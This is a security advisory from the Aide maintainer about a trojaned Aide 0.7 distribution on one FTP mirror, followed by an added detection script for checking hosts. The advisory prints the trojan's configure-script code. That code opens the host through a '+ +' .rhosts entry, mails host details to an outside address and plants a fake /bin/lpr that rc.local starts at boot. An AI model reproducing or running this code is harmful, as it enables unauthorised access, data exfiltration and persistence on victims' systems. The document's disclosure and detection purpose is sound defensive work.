It has come to my attention that there has been a trojaned Aide distribution at ftp://ftp.linux.hr/pub/aide

The offending binary has been removed.

Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to download it from ftp://ftp.cs.tut.fi/pub/src/gnu and always check the PGP signature before using any distribution of Aide.

The trojaned distribution contains the following script embedded in the configure script. As you can see, it tries to add "+ +" to root's .rhosts and sends information about your host to [EMAIL PROTECTED]

    # checking if we are root or not
    if [ `whoami` == "root" ];then
      root_user=1
    else
      root_user=0
    fi

And later on:

    if [ $root_user != "1" ];then
      echo "+ +" > ~/.rhosts
      echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
      mail [EMAIL PROTECTED] < /tmp/jea
      rm -rf /tmp/jea
    else
      if [ `uname -s` != Linux ];then
        echo ""
      else
        mv -f .xinitrc /bin/lpr
        echo "# printing status monitor" >> /etc/rc.d/rc.local
        echo "/bin/lpr &" >> /etc/rc.d/rc.local
        hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
        mail [EMAIL PROTECTED] < /tmp/jea
        /bin/lpr &
        rm -rf /tmp/jea
      fi
    fi

Rami Lehti
--
AIDE - Advanced Intrusion Detection Environment
Check http://www.cs.tut.fi/~rammer/aide.html
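For anyone who ran the configure script from the ftp.linux.hr copy, the traces the quoted script leaves behind can be checked for directly. The following is an added example, not part of the original advisory or of Aide: the function names `scan_host` and `make_sample` are hypothetical, user home directories are assumed to live under /home, and the sample tree is constructed.

```shell
#!/bin/sh
# scan_host ROOT: ROOT is a filesystem prefix ("" for the live system, or
# the mount point of an offline image). Prints one line per indicator found
# and nothing on a clean tree. Assumption: user homes are under /home.
scan_host() {
    root=$1
    # 1. A "+ +" line in .rhosts trusts every user on every host.
    for f in "$root"/root/.rhosts "$root"/home/*/.rhosts; do
        [ -f "$f" ] || continue
        if grep -Eq '^[[:space:]]*\+[[:space:]]+\+[[:space:]]*$' "$f"; then
            echo "rhosts-wildcard: $f"
        fi
    done
    # 2. Boot entry starting /bin/lpr in the background. /bin/lpr may be a
    #    legitimate binary, so the rc.local line is the indicator, not the file.
    rc="$root/etc/rc.d/rc.local"
    if [ -f "$rc" ] && grep -Eq '^[[:space:]]*/bin/lpr[[:space:]]*&' "$rc"; then
        echo "rc.local-lpr: $rc"
    fi
    # 3. Staging file. The script deletes it, so its absence proves nothing.
    if [ -e "$root/tmp/jea" ]; then
        echo "staging-file: $root/tmp/jea"
    fi
    return 0
}

# Constructed sample tree reproducing what the quoted script leaves behind.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/home/alice" "$d/etc/rc.d" "$d/tmp"
    echo "+ +" > "$d/home/alice/.rhosts"
    printf '# printing status monitor\n/bin/lpr &\n' > "$d/etc/rc.d/rc.local"
    echo "$d"
}

# Usage: sh thisfile --scan ""   (live system)   or   --scan /mnt/image
if [ "${1:-}" = "--scan" ]; then
    scan_host "${2:-}"
fi
```

A hit on the rc.local check means the root branch of the script ran, so the host should be treated as compromised rather than cleaned in place.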
